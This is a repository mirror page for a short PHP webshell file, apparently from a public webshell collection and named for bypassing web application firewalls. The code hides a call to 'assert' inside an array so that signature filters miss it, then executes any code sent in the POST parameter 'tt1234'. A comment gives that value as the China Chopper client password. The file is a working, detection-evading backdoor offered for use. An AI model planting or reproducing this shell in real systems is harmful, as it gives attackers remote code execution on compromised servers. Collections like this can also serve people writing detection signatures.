1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 13:21:28 +00:00
Files
webshell/php/pass-waf-2014-10-19.php
2014-10-20 08:27:05 +08:00

5 lines
117 B
PHP

<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>